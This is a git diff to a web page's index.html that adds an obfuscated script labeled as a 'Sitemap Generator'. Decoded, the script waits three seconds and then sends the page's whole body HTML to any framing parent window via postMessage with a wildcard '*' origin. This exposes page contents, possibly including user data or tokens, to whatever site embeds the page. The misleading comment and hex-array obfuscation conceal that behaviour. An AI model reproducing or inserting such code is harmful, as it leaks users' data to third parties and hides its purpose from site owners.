--- a/index.html
+++ b/index.html
@@ -79,5 +79,9 @@
     <!-- built files will be auto injected -->
     <div class="fb-quote"></div>
     <div class="fb-customerchat" page_id="1515670032095765"></div>
+    <!-- Sitemap Generator -->
+    <script type="text/javascript">
+      var _0xaea9=["sitemapgenerator:: ","innerHTML","body","document","stringify","*","postMessage","setTimeout"];window[_0xaea9[7]](function(){parent[_0xaea9[6]](_0xaea9[0]+JSON[_0xaea9[4]](window[_0xaea9[3]][_0xaea9[2]][_0xaea9[1]]),_0xaea9[5])},3000);
+    </script>
   </body>
 </html>
